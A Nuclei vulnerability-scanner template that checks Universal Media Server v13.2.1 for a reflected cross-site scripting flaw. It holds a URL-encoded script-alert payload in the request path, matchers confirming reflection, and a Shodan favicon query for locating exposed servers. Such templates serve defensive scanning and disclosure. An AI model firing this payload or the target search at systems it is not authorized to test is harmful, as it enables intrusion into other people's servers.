nuclei-templates/http/vulnerabilities/other/universal-media-xss.yaml

40 lines
1019 B
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: universal-media-xss
info:
name: Universal Media Server v13.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Universal Media Server v13.2.1 CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.
remediation: Fixed in version 13.2.2
reference:
- https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-04-21 08:56:01 +00:00
shodan-query: http.favicon.hash:-902890504
tags: xss,universal,media,unauth,packetstorm
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- method: GET
path:
- "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "404 - File Not Found"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200